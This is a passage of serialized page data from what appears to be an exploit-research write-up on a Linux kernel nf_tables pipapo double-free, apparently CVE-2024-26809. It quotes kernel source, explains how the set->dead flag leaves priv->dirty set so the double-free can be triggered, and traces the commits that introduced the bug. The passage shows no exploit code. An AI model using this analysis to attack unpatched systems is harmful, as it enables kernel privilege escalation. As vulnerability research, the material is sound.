nft_set_commit_update",{"type":28,"tag":116,"props":52434,"children":52435},{"style":266},[52436],{"type":33,"value":313},{"type":28,"tag":116,"props":52438,"children":52439},{"style":370},[52440],{"type":33,"value":2780},{"type":28,"tag":116,"props":52442,"children":52443},{"style":272},[52444],{"type":33,"value":52445},"set_update_list",{"type":28,"tag":116,"props":52447,"children":52448},{"style":266},[52449],{"type":33,"value":895},{"type":28,"tag":116,"props":52451,"children":52452},{"class":245,"line":1071},[52453],{"type":28,"tag":116,"props":52454,"children":52455},{"style":266},[52456],{"type":33,"value":9986},{"type":28,"tag":116,"props":52458,"children":52459},{"class":245,"line":1137},[52460,52465],{"type":28,"tag":116,"props":52461,"children":52462},{"style":282},[52463],{"type":33,"value":52464}," nf_tables_commit_release",{"type":28,"tag":116,"props":52466,"children":52467},{"style":266},[52468],{"type":33,"value":52469},"(net);\n",{"type":28,"tag":116,"props":52471,"children":52472},{"class":245,"line":1181},[52473],{"type":28,"tag":116,"props":52474,"children":52475},{"emptyLinePlaceholder":19},[52476],{"type":33,"value":1044},{"type":28,"tag":116,"props":52478,"children":52479},{"class":245,"line":1212},[52480,52485,52489],{"type":28,"tag":116,"props":52481,"children":52482},{"style":260},[52483],{"type":33,"value":52484}," return",{"type":28,"tag":116,"props":52486,"children":52487},{"style":350},[52488],{"type":33,"value":2718},{"type":28,"tag":116,"props":52490,"children":52491},{"style":266},[52492],{"type":33,"value":384},{"type":28,"tag":116,"props":52494,"children":52495},{"class":245,"line":1254},[52496],{"type":28,"tag":116,"props":52497,"children":52498},{"style":266},[52499],{"type":33,"value":406},{"type":28,"tag":29,"props":52501,"children":52502},{},[52503,52504,52510,52512,52517],{"type":33,"value":16275},{"type":28,"tag":98,"props":52505,"children":52507},{"className":52506},[],[52508],{"type":33,"value":52509},"nft_set_commit_update()",{"type":33,"value":52511}," function in the code above will call the ",{"type":28,"tag":98,"props":52513,"children":52515},{"className":52514},[],[52516],{"type":33,"value":51963},{"type":33,"value":52518}," method for any objects that were marked as pending an update.",{"type":28,"tag":234,"props":52520,"children":52522},{"className":16176,"code":52521,"language":1797,"meta":7,"style":7},"static void nft_set_commit_update(struct list_head *set_update_list)\n{\n struct nft_set *set, *next;\n\n list_for_each_entry_safe(set, next, set_update_list, pending_update) {\n  list_del_init(&set->pending_update);\n\n  if (!set->ops->commit || set->dead) // [4]\n   continue;\n\n  set->ops->commit(set); // [5]\n }\n}\n",[52523],{"type":28,"tag":98,"props":52524,"children":52525},{"__ignoreMap":7},[52526,52566,52573,52602,52609,52622,52654,52661,52722,52733,52740,52774,52781],{"type":28,"tag":116,"props":52527,"children":52528},{"class":245,"line":246},[52529,52533,52537,52541,52545,52549,52554,52558,52562],{"type":28,"tag":116,"props":52530,"children":52531},{"style":376},[52532],{"type":33,"value":50664},{"type":28,"tag":116,"props":52534,"children":52535},{"style":376},[52536],{"type":33,"value":2169},{"type":28,"tag":116,"props":52538,"children":52539},{"style":282},[52540],{"type":33,"value":52432},{"type":28,"tag":116,"props":52542,"children":52543},{"style":266},[52544],{"type":33,"value":313},{"type":28,"tag":116,"props":52546,"children":52547},{"style":376},[52548],{"type":33,"value":9069},{"type":28,"tag":116,"props":52550,"children":52551},{"style":266},[52552],{"type":33,"value":52553}," list_head ",{"type":28,"tag":116,"props":52555,"children":52556},{"style":370},[52557],{"type":33,"value":4240},{"type":28,"tag":116,"props":52559,"children":52560},{"style":272},[52561],{"type":33,"value":52445},{"type":28,"tag":116,"props":52563,"children":52564},{"style":266},[52565],{"type":33,"value":2830},{"type":28,"tag":116,"props":52567,"children":52568},{"class":245,"line":256},[52569],{"type":28,"tag":116,"props":52570,"children":52571},{"style":266},[52572],{"type":33,"value":10547},{"type":28,"tag":116,"props":52574,"children":52575},{"class":245,"line":293},[52576,52580,52584,52588,52593,52597],{"type":28,"tag":116,"props":52577,"children":52578},{"style":376},[52579],{"type":33,"value":20814},{"type":28,"tag":116,"props":52581,"children":52582},{"style":266},[52583],{"type":33,"value":50718},{"type":28,"tag":116,"props":52585,"children":52586},{"style":370},[52587],{"type":33,"value":4240},{"type":28,"tag":116,"props":52589,"children":52590},{"style":266},[52591],{"type":33,"value":52592},"set, ",{"type":28,"tag":116,"props":52594,"children":52595},{"style":370},[52596],{"type":33,"value":4240},{"type":28,"tag":116,"props":52598,"children":52599},{"style":266},[52600],{"type":33,"value":52601},"next;\n",{"type":28,"tag":116,"props":52603,"children":52604},{"class":245,"line":361},[52605],{"type":28,"tag":116,"props":52606,"children":52607},{"emptyLinePlaceholder":19},[52608],{"type":33,"value":1044},{"type":28,"tag":116,"props":52610,"children":52611},{"class":245,"line":387},[52612,52617],{"type":28,"tag":116,"props":52613,"children":52614},{"style":282},[52615],{"type":33,"value":52616}," list_for_each_entry_safe",{"type":28,"tag":116,"props":52618,"children":52619},{"style":266},[52620],{"type":33,"value":52621},"(set, next, set_update_list, pending_update) {\n",{"type":28,"tag":116,"props":52623,"children":52624},{"class":245,"line":400},[52625,52630,52634,52638,52642,52646,52650],{"type":28,"tag":116,"props":52626,"children":52627},{"style":282},[52628],{"type":33,"value":52629},"  list_del_init",{"type":28,"tag":116,"props":52631,"children":52632},{"style":266},[52633],{"type":33,"value":313},{"type":28,"tag":116,"props":52635,"children":52636},{"style":370},[52637],{"type":33,"value":2780},{"type":28,"tag":116,"props":52639,"children":52640},{"style":272},[52641],{"type":33,"value":50639},{"type":28,"tag":116,"props":52643,"children":52644},{"style":266},[52645],{"type":33,"value":13423},{"type":28,"tag":116,"props":52647,"children":52648},{"style":272},[52649],{"type":33,"value":52339},{"type":28,"tag":116,"props":52651,"children":52652},{"style":266},[52653],{"type":33,"value":895},{"type":28,"tag":116,"props":52655,"children":52656},{"class":245,"line":614},[52657],{"type":28,"tag":116,"props":52658,"children":52659},{"emptyLinePlaceholder":19},[52660],{"type":33,"value":1044},{"type":28,"tag":116,"props":52662,"children":52663},{"class":245,"line":631},[52664,52668,52672,52676,52680,52684,52688,52692,52696,52700,52705,52709,52713,52717],{"type":28,"tag":116,"props":52665,"children":52666},{"style":260},[52667],{"type":33,"value":31045},{"type":28,"tag":116,"props":52669,"children":52670},{"style":266},[52671],{"type":33,"value":269},{"type":28,"tag":116,"props":52673,"children":52674},{"style":370},[52675],{"type":33,"value":20285},{"type":28,"tag":116,"props":52677,"children":52678},{"style":272},[52679],{"type":33,"value":50639},{"type":28,"tag":116,"props":52681,"children":52682},{"style":266},[52683],{"type":33,"value":13423},{"type":28,"tag":116,"props":52685,"children":52686},{"style":272},[52687],{"type":33,"value":52288},{"type":28,"tag":116,"props":52689,"children":52690},{"style":266},[52691],{"type":33,"value":13423},{"type":28,"tag":116,"props":52693,"children":52694},{"style":272},[52695],{"type":33,"value":52297},{"type":28,"tag":116,"props":52697,"children":52698},{"style":370},[52699],{"type":33,"value":23361},{"type":28,"tag":116,"props":52701,"children":52702},{"style":272},[52703],{"type":33,"value":52704}," set",{"type":28,"tag":116,"props":52706,"children":52707},{"style":266},[52708],{"type":33,"value":13423},{"type":28,"tag":116,"props":52710,"children":52711},{"style":272},[52712],{"type":33,"value":52107},{"type":28,"tag":116,"props":52714,"children":52715},{"style":266},[52716],{"type":33,"value":1829},{"type":28,"tag":116,"props":52718,"children":52719},{"style":250},[52720],{"type":33,"value":52721}," // [4]\n",{"type":28,"tag":116,"props":52723,"children":52724},{"class":245,"line":665},[52725,52729],{"type":28,"tag":116,"props":52726,"children":52727},{"style":260},[52728],{"type":33,"value":51109},{"type":28,"tag":116,"props":52730,"children":52731},{"style":266},[52732],{"type":33,"value":384},{"type":28,"tag":116,"props":52734,"children":52735},{"class":245,"line":713},[52736],{"type":28,"tag":116,"props":52737,"children":52738},{"emptyLinePlaceholder":19},[52739],{"type":33,"value":1044},{"type":28,"tag":116,"props":52741,"children":52742},{"class":245,"line":750},[52743,52748,52752,52756,52760,52764,52769],{"type":28,"tag":116,"props":52744,"children":52745},{"style":272},[52746],{"type":33,"value":52747},"  set",{"type":28,"tag":116,"props":52749,"children":52750},{"style":266},[52751],{"type":33,"value":13423},{"type":28,"tag":116,"props":52753,"children":52754},{"style":272},[52755],{"type":33,"value":52288},{"type":28,"tag":116,"props":52757,"children":52758},{"style":266},[52759],{"type":33,"value":13423},{"type":28,"tag":116,"props":52761,"children":52762},{"style":282},[52763],{"type":33,"value":52297},{"type":28,"tag":116,"props":52765,"children":52766},{"style":266},[52767],{"type":33,"value":52768},"(set);",{"type":28,"tag":116,"props":52770,"children":52771},{"style":250},[52772],{"type":33,"value":52773}," // [5]\n",{"type":28,"tag":116,"props":52775,"children":52776},{"class":245,"line":779},[52777],{"type":28,"tag":116,"props":52778,"children":52779},{"style":266},[52780],{"type":33,"value":9264},{"type":28,"tag":116,"props":52782,"children":52783},{"class":245,"line":796},[52784],{"type":28,"tag":116,"props":52785,"children":52786},{"style":266},[52787],{"type":33,"value":406},{"type":28,"tag":29,"props":52789,"children":52790},{},[52791,52793,52799,52801,52806,52807,52812],{"type":33,"value":52792},"Later on, the ",{"type":28,"tag":98,"props":52794,"children":52796},{"className":52795},[],[52797],{"type":33,"value":52798},"nf_tables_commit_release()",{"type":33,"value":52800}," function is called to free any objects that were marked for release, and eventually calls the ",{"type":28,"tag":98,"props":52802,"children":52804},{"className":52803},[],[52805],{"type":33,"value":50639},{"type":33,"value":51957},{"type":28,"tag":98,"props":52808,"children":52810},{"className":52809},[],[52811],{"type":33,"value":51971},{"type":33,"value":52813}," method.",{"type":28,"tag":234,"props":52815,"children":52817},{"className":16176,"code":52816,"language":1797,"meta":7,"style":7},"static void nf_tables_commit_release(struct net *net)\n{\n[...]\n schedule_work(&trans_destroy_work);\n[...]\n}\n[...]\nstatic void nf_tables_trans_destroy_work(struct work_struct *w)\n{\n[...]\n list_for_each_entry_safe(trans, next, &head, list) {\n  nft_trans_list_del(trans);\n  nft_commit_release(trans);\n }\n}\n[...]\nstatic void nft_commit_release(struct nft_trans *trans)\n{\n switch (trans->msg_type) {\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET:\n  nft_set_destroy(&trans->ctx, nft_trans_set(trans));\n[...]\n}\n[...]\nstatic void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)\n{\n[...]\n set->ops->destroy(ctx, set);\n[...]\n}\n",[52818],{"type":28,"tag":98,"props":52819,"children":52820},{"__ignoreMap":7},[52821,52860,52867,52874,52895,52902,52909,52916,52957,52964,52971,52992,53005,53017,53024,53031,53038,53079,53086,53114,53121,53134,53146,53187,53194,53201,53208,53266,53273,53280,53309,53316],{"type":28,"tag":116,"props":52822,"children":52823},{"class":245,"line":246},[52824,52828,52832,52836,52840,52844,52848,52852,52856],{"type":28,"tag":116,"props":52825,"children":52826},{"style":376},[52827],{"type":33,"value":50664},{"type":28,"tag":116,"props":52829,"children":52830},{"style":376},[52831],{"type":33,"value":2169},{"type":28,"tag":116,"props":52833,"children":52834},{"style":282},[52835],{"type":33,"value":52464},{"type":28,"tag":116,"props":52837,"children":52838},{"style":266},[52839],{"type":33,"value":313},{"type":28,"tag":116,"props":52841,"children":52842},{"style":376},[52843],{"type":33,"value":9069},{"type":28,"tag":116,"props":52845,"children":52846},{"style":266},[52847],{"type":33,"value":51620},{"type":28,"tag":116,"props":52849,"children":52850},{"style":370},[52851],{"type":33,"value":4240},{"type":28,"tag":116,"props":52853,"children":52854},{"style":272},[52855],{"type":33,"value":51629},{"type":28,"tag":116,"props":52857,"children":52858},{"style":266},[52859],{"type":33,"value":2830},{"type":28,"tag":116,"props":52861,"children":52862},{"class":245,"line":256},[52863],{"type":28,"tag":116,"props":52864,"children":52865},{"style":266},[52866],{"type":33,"value":10547},{"type":28,"tag":116,"props":52868,"children":52869},{"class":245,"line":293},[52870],{"type":28,"tag":116,"props":52871,"children":52872},{"style":266},[52873],{"type":33,"value":9986},{"type":28,"tag":116,"props":52875,"children":52876},{"class":245,"line":361},[52877,52882,52886,52890],{"type":28,"tag":116,"props":52878,"children":52879},{"style":282},[52880],{"type":33,"value":52881}," schedule_work",{"type":28,"tag":116,"props":52883,"children":52884},{"style":266},[52885],{"type":33,"value":313},{"type":28,"tag":116,"props":52887,"children":52888},{"style":370},[52889],{"type":33,"value":2780},{"type":28,"tag":116,"props":52891,"children":52892},{"style":266},[52893],{"type":33,"value":52894},"trans_destroy_work);\n",{"type":28,"tag":116,"props":52896,"children":52897},{"class":245,"line":387},[52898],{"type":28,"tag":116,"props":52899,"children":52900},{"style":266},[52901],{"type":33,"value":9986},{"type":28,"tag":116,"props":52903,"children":52904},{"class":245,"line":400},[52905],{"type":28,"tag":116,"props":52906,"children":52907},{"style":266},[52908],{"type":33,"value":406},{"type":28,"tag":116,"props":52910,"children":52911},{"class":245,"line":614},[52912],{"type":28,"tag":116,"props":52913,"children":52914},{"style":266},[52915],{"type":33,"value":9986},{"type":28,"tag":116,"props":52917,"children":52918},{"class":245,"line":631},[52919,52923,52927,52932,52936,52940,52945,52949,52953],{"type":28,"tag":116,"props":52920,"children":52921},{"style":376},[52922],{"type":33,"value":50664},{"type":28,"tag":116,"props":52924,"children":52925},{"style":376},[52926],{"type":33,"value":2169},{"type":28,"tag":116,"props":52928,"children":52929},{"style":282},[52930],{"type":33,"value":52931}," nf_tables_trans_destroy_work",{"type":28,"tag":116,"props":52933,"children":52934},{"style":266},[52935],{"type":33,"value":313},{"type":28,"tag":116,"props":52937,"children":52938},{"style":376},[52939],{"type":33,"value":9069},{"type":28,"tag":116,"props":52941,"children":52942},{"style":266},[52943],{"type":33,"value":52944}," work_struct ",{"type":28,"tag":116,"props":52946,"children":52947},{"style":370},[52948],{"type":33,"value":4240},{"type":28,"tag":116,"props":52950,"children":52951},{"style":272},[52952],{"type":33,"value":49193},{"type":28,"tag":116,"props":52954,"children":52955},{"style":266},[52956],{"type":33,"value":2830},{"type":28,"tag":116,"props":52958,"children":52959},{"class":245,"line":665},[52960],{"type":28,"tag":116,"props":52961,"children":52962},{"style":266},[52963],{"type":33,"value":10547},{"type":28,"tag":116,"props":52965,"children":52966},{"class":245,"line":713},[52967],{"type":28,"tag":116,"props":52968,"children":52969},{"style":266},[52970],{"type":33,"value":9986},{"type":28,"tag":116,"props":52972,"children":52973},{"class":245,"line":750},[52974,52978,52983,52987],{"type":28,"tag":116,"props":52975,"children":52976},{"style":282},[52977],{"type":33,"value":52616},{"type":28,"tag":116,"props":52979,"children":52980},{"style":266},[52981],{"type":33,"value":52982},"(trans, next, ",{"type":28,"tag":116,"props":52984,"children":52985},{"style":370},[52986],{"type":33,"value":2780},{"type":28,"tag":116,"props":52988,"children":52989},{"style":266},[52990],{"type":33,"value":52991},"head, list) {\n",{"type":28,"tag":116,"props":52993,"children":52994},{"class":245,"line":779},[52995,53000],{"type":28,"tag":116,"props":52996,"children":52997},{"style":282},[52998],{"type":33,"value":52999},"  nft_trans_list_del",{"type":28,"tag":116,"props":53001,"children":53002},{"style":266},[53003],{"type":33,"value":53004},"(trans);\n",{"type":28,"tag":116,"props":53006,"children":53007},{"class":245,"line":796},[53008,53013],{"type":28,"tag":116,"props":53009,"children":53010},{"style":282},[53011],{"type":33,"value":53012},"  nft_commit_release",{"type":28,"tag":116,"props":53014,"children":53015},{"style":266},[53016],{"type":33,"value":53004},{"type":28,"tag":116,"props":53018,"children":53019},{"class":245,"line":847},[53020],{"type":28,"tag":116,"props":53021,"children":53022},{"style":266},[53023],{"type":33,"value":9264},{"type":28,"tag":116,"props":53025,"children":53026},{"class":245,"line":898},[53027],{"type":28,"tag":116,"props":53028,"children":53029},{"style":266},[53030],{"type":33,"value":406},{"type":28,"tag":116,"props":53032,"children":53033},{"class":245,"line":907},[53034],{"type":28,"tag":116,"props":53035,"children":53036},{"style":266},[53037],{"type":33,"value":9986},{"type":28,"tag":116,"props":53039,"children":53040},{"class":245,"line":981},[53041,53045,53049,53054,53058,53062,53067,53071,53075],{"type":28,"tag":116,"props":53042,"children":53043},{"style":376},[53044],{"type":33,"value":50664},{"type":28,"tag":116,"props":53046,"children":53047},{"style":376},[53048],{"type":33,"value":2169},{"type":28,"tag":116,"props":53050,"children":53051},{"style":282},[53052],{"type":33,"value":53053}," nft_commit_release",{"type":28,"tag":116,"props":53055,"children":53056},{"style":266},[53057],{"type":33,"value":313},{"type":28,"tag":116,"props":53059,"children":53060},{"style":376},[53061],{"type":33,"value":9069},{"type":28,"tag":116,"props":53063,"children":53064},{"style":266},[53065],{"type":33,"value":53066}," nft_trans ",{"type":28,"tag":116,"props":53068,"children":53069},{"style":370},[53070],{"type":33,"value":4240},{"type":28,"tag":116,"props":53072,"children":53073},{"style":272},[53074],{"type":33,"value":52179},{"type":28,"tag":116,"props":53076,"children":53077},{"style":266},[53078],{"type":33,"value":2830},{"type":28,"tag":116,"props":53080,"children":53081},{"class":245,"line":1011},[53082],{"type":28,"tag":116,"props":53083,"children":53084},{"style":266},[53085],{"type":33,"value":10547},{"type":28,"tag":116,"props":53087,"children":53088},{"class":245,"line":1029},[53089,53094,53098,53102,53106,53110],{"type":28,"tag":116,"props":53090,"children":53091},{"style":260},[53092],{"type":33,"value":53093}," switch",{"type":28,"tag":116,"props":53095,"children":53096},{"style":266},[53097],{"type":33,"value":269},{"type":28,"tag":116,"props":53099,"children":53100},{"style":272},[53101],{"type":33,"value":52179},{"type":28,"tag":116,"props":53103,"children":53104},{"style":266},[53105],{"type":33,"value":13423},{"type":28,"tag":116,"props":53107,"children":53108},{"style":272},[53109],{"type":33,"value":52217},{"type":28,"tag":116,"props":53111,"children":53112},{"style":266},[53113],{"type":33,"value":844},{"type":28,"tag":116,"props":53115,"children":53116},{"class":245,"line":1038},[53117],{"type":28,"tag":116,"props":53118,"children":53119},{"style":266},[53120],{"type":33,"value":9986},{"type":28,"tag":116,"props":53122,"children":53123},{"class":245,"line":1047},[53124,53129],{"type":28,"tag":116,"props":53125,"children":53126},{"style":260},[53127],{"type":33,"value":53128}," case",{"type":28,"tag":116,"props":53130,"children":53131},{"style":266},[53132],{"type":33,"value":53133}," NFT_MSG_DELSET:\n",{"type":28,"tag":116,"props":53135,"children":53136},{"class":245,"line":1071},[53137,53141],{"type":28,"tag":116,"props":53138,"children":53139},{"style":260},[53140],{"type":33,"value":53128},{"type":28,"tag":116,"props":53142,"children":53143},{"style":266},[53144],{"type":33,"value":53145}," NFT_MSG_DESTROYSET:\n",{"type":28,"tag":116,"props":53147,"children":53148},{"class":245,"line":1137},[53149,53154,53158,53162,53166,53170,53174,53178,53182],{"type":28,"tag":116,"props":53150,"children":53151},{"style":282},[53152],{"type":33,"value":53153},"  nft_set_destroy",{"type":28,"tag":116,"props":53155,"children":53156},{"style":266},[53157],{"type":33,"value":313},{"type":28,"tag":116,"props":53159,"children":53160},{"style":370},[53161],{"type":33,"value":2780},{"type":28,"tag":116,"props":53163,"children":53164},{"style":266},[53165],{"type":33,"value":52179},{"type":28,"tag":116,"props":53167,"children":53168},{"style":370},[53169],{"type":33,"value":13423},{"type":28,"tag":116,"props":53171,"children":53172},{"style":272},[53173],{"type":33,"value":19944},{"type":28,"tag":116,"props":53175,"children":53176},{"style":266},[53177],{"type":33,"value":825},{"type":28,"tag":116,"props":53179,"children":53180},{"style":282},[53181],{"type":33,"value":52145},{"type":28,"tag":116,"props":53183,"children":53184},{"style":266},[53185],{"type":33,"value":53186},"(trans));\n",{"type":28,"tag":116,"props":53188,"children":53189},{"class":245,"line":1181},[53190],{"type":28,"tag":116,"props":53191,"children":53192},{"style":266},[53193],{"type":33,"value":9986},{"type":28,"tag":116,"props":53195,"children":53196},{"class":245,"line":1212},[53197],{"type":28,"tag":116,"props":53198,"children":53199},{"style":266},[53200],{"type":33,"value":406},{"type":28,"tag":116,"props":53202,"children":53203},{"class":245,"line":1254},[53204],{"type":28,"tag":116,"props":53205,"children":53206},{"style":266},[53207],{"type":33,"value":9986},{"type":28,"tag":116,"props":53209,"children":53210},{"class":245,"line":1262},[53211,53215,53219,53224,53228,53232,53236,53240,53244,53249,53253,53257,53261],{"type":28,"tag":116,"props":53212,"children":53213},{"style":376},[53214],{"type":33,"value":50664},{"type":28,"tag":116,"props":53216,"children":53217},{"style":376},[53218],{"type":33,"value":2169},{"type":28,"tag":116,"props":53220,"children":53221},{"style":282},[53222],{"type":33,"value":53223}," nft_set_destroy",{"type":28,"tag":116,"props":53225,"children":53226},{"style":266},[53227],{"type":33,"value":313},{"type":28,"tag":116,"props":53229,"children":53230},{"style":376},[53231],{"type":33,"value":9323},{"type":28,"tag":116,"props":53233,"children":53234},{"style":376},[53235],{"type":33,"value":20814},{"type":28,"tag":116,"props":53237,"children":53238},{"style":266},[53239],{"type":33,"value":50690},{"type":28,"tag":116,"props":53241,"children":53242},{"style":370},[53243],{"type":33,"value":4240},{"type":28,"tag":116,"props":53245,"children":53246},{"style":266},[53247],{"type":33,"value":53248},"ctx, ",{"type":28,"tag":116,"props":53250,"children":53251},{"style":376},[53252],{"type":33,"value":9069},{"type":28,"tag":116,"props":53254,"children":53255},{"style":266},[53256],{"type":33,"value":50718},{"type":28,"tag":116,"props":53258,"children":53259},{"style":370},[53260],{"type":33,"value":4240},{"type":28,"tag":116,"props":53262,"children":53263},{"style":266},[53264],{"type":33,"value":53265},"set)\n",{"type":28,"tag":116,"props":53267,"children":53268},{"class":245,"line":1294},[53269],{"type":28,"tag":116,"props":53270,"children":53271},{"style":266},[53272],{"type":33,"value":10547},{"type":28,"tag":116,"props":53274,"children":53275},{"class":245,"line":1334},[53276],{"type":28,"tag":116,"props":53277,"children":53278},{"style":266},[53279],{"type":33,"value":9986},{"type":28,"tag":116,"props":53281,"children":53282},{"class":245,"line":1372},[53283,53287,53291,53295,53299,53304],{"type":28,"tag":116,"props":53284,"children":53285},{"style":272},[53286],{"type":33,"value":52704},{"type":28,"tag":116,"props":53288,"children":53289},{"style":266},[53290],{"type":33,"value":13423},{"type":28,"tag":116,"props":53292,"children":53293},{"style":272},[53294],{"type":33,"value":52288},{"type":28,"tag":116,"props":53296,"children":53297},{"style":266},[53298],{"type":33,"value":13423},{"type":28,"tag":116,"props":53300,"children":53301},{"style":282},[53302],{"type":33,"value":53303},"destroy",{"type":28,"tag":116,"props":53305,"children":53306},{"style":266},[53307],{"type":33,"value":53308},"(ctx, set);\n",{"type":28,"tag":116,"props":53310,"children":53311},{"class":245,"line":1381},[53312],{"type":28,"tag":116,"props":53313,"children":53314},{"style":266},[53315],{"type":33,"value":9986},{"type":28,"tag":116,"props":53317,"children":53318},{"class":245,"line":1389},[53319],{"type":28,"tag":116,"props":53320,"children":53321},{"style":266},[53322],{"type":33,"value":406},{"type":28,"tag":29,"props":53324,"children":53325},{},[53326,53328,53333,53335,53340,53342,53348,53350,53355,53357,53362,53364,53368,53370,53375,53376,53380,53382,53388],{"type":33,"value":53327},"It may appear as if it would be impossible to make ",{"type":28,"tag":98,"props":53329,"children":53331},{"className":53330},[],[53332],{"type":33,"value":50593},{"type":33,"value":53334}," true in the release step because the ",{"type":28,"tag":98,"props":53336,"children":53338},{"className":53337},[],[53339],{"type":33,"value":51963},{"type":33,"value":53341}," method is always invoked first...\nHowever, one last piece brings this bug to life: the ",{"type":28,"tag":98,"props":53343,"children":53345},{"className":53344},[],[53346],{"type":33,"value":53347},"set->dead",{"type":33,"value":53349}," flag. If a ",{"type":28,"tag":98,"props":53351,"children":53353},{"className":53352},[],[53354],{"type":33,"value":50639},{"type":33,"value":53356}," was marked for deletion, it receives the ",{"type":28,"tag":98,"props":53358,"children":53360},{"className":53359},[],[53361],{"type":33,"value":53347},{"type":33,"value":53363}," flag ",{"type":28,"tag":116,"props":53365,"children":53366},{},[53367],{"type":33,"value":2794},{"type":33,"value":53369},". If this flag is set, then the commit path will skip any commitments to this ",{"type":28,"tag":98,"props":53371,"children":53373},{"className":53372},[],[53374],{"type":33,"value":50639},{"type":33,"value":6129},{"type":28,"tag":116,"props":53377,"children":53378},{},[53379],{"type":33,"value":17190},{"type":33,"value":53381},". This is extremely convenient for us and will allow us to trigger the double-free because the ",{"type":28,"tag":98,"props":53383,"children":53385},{"className":53384},[],[53386],{"type":33,"value":53387},"priv ->dirty",{"type":33,"value":53389}," flag is not cleared when it should have been.",{"type":28,"tag":63,"props":53391,"children":53393},{"id":53392},"tracing-the-guilty-commit",[53394],{"type":33,"value":53395},"Tracing the guilty commit",{"type":28,"tag":29,"props":53397,"children":53398},{},[53399,53401,53408,53410,53416,53418,53423,53425,53431],{"type":33,"value":53400},"The above scenario raises some interesting suppositions about how this vulnerability was introduced. See, any ",{"type":28,"tag":87,"props":53402,"children":53405},{"href":53403,"rel":53404},"https://ubuntu.com/security/CVE-2024-26809",[91],[53406],{"type":33,"value":53407},"advisories",{"type":33,"value":53409}," about this vulnerability will say it was introduced by this ",{"type":28,"tag":87,"props":53411,"children":53414},{"href":53412,"rel":53413},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",[91],[53415],{"type":33,"value":52297},{"type":33,"value":53417},", which sounds fair considering this added the weird code that frees twice in the same path. However, by checking the blame on the ",{"type":28,"tag":98,"props":53419,"children":53421},{"className":53420},[],[53422],{"type":33,"value":53347},{"type":33,"value":53424}," flag, which was what actually made this exploitable, we will learn that it was only introduced over a year after the commit above in this ",{"type":28,"tag":87,"props":53426,"children":53429},{"href":53427,"rel":53428},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26",[91],[53430],{"type":33,"value":52297},{"type":33,"value":141},{"type":28,"tag":29,"props":53433,"children":53434},{},[53435],{"type":33,"value":53436},"By reading the message of the first commit, we can finally understand why this code was added:",{"type":28,"tag":234,"props":53438,"children":53442},{"className":53439,"code":53440,"language":53441,"meta":7,"style":7},"language-txt shiki shiki-themes slack-dark","New elements that reside in the clone are not released in case that the\ntransaction is aborted.\n\n[16302.231754] ------------[ cut here ]------------\n[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[...]\n[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ #155\n[...]\n[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n[...]\n[16302.231917] Call Trace:\n[16302.231919]  \u003CTASK>\n[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n[16302.231952]  ? __nla_validate_parse+0x48/0x190\n[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n[16302.231963]  netlink_unicast+0x211/0x340\n[16302.231969]  netlink_sendmsg+0x21e/0x460\n\nAdd nft_set_pipapo_match_destroy() helper function to release the\nelements in the lookup tables.\n\nStefano Brivio says: \"We additionally look for elements pointers in the\ncloned matching data if priv->dirty is set, because that means that\ncloned data might point to additional elements we did not commit to the\nworking copy yet (such as the abort path case, but perhaps not limited\nto it).\"\n\nFixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\nReviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\nSigned-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n","txt",[53443],{"type":28,"tag":98,"props":53444,"children":53445},{"__ignoreMap":7},[53446,53454,53462,53469,53477,53485,53492,53500,53507,53515,53523,53530,53538,53546,53554,53562,53570,53578,53586,53594,53602,53609,53617,53625,53632,53640,53648,53656,53664,53672,53679,53687,53695],{"type":28,"tag":116,"props":53447,"children":53448},{"class":245,"line":246},[53449],{"type":28,"tag":116,"props":53450,"children":53451},{},[53452],{"type":33,"value":53453},"New elements that reside in the clone are not released in case that the\n",{"type":28,"tag":116,"props":53455,"children":53456},{"class":245,"line":256},[53457],{"type":28,"tag":116,"props":53458,"children":53459},{},[53460],{"type":33,"value":53461},"transaction is aborted.\n",{"type":28,"tag":116,"props":53463,"children":53464},{"class":245,"line":293},[53465],{"type":28,"tag":116,"props":53466,"children":53467},{"emptyLinePlaceholder":19},[53468],{"type":33,"value":1044},{"type":28,"tag":116,"props":53470,"children":53471},{"class":245,"line":361},[53472],{"type":28,"tag":116,"props":53473,"children":53474},{},[53475],{"type":33,"value":53476},"[16302.231754] ------------[ cut here ]------------\n",{"type":28,"tag":116,"props":53478,"children":53479},{"class":245,"line":387},[53480],{"type":28,"tag":116,"props":53481,"children":53482},{},[53483],{"type":33,"value":53484},"[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":28,"tag":116,"props":53486,"children":53487},{"class":245,"line":400},[53488],{"type":28,"tag":116,"props":53489,"children":53490},{},[53491],{"type":33,"value":9986},{"type":28,"tag":116,"props":53493,"children":53494},{"class":245,"line":614},[53495],{"type":28,"tag":116,"props":53496,"children":53497},{},[53498],{"type":33,"value":53499},"[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ 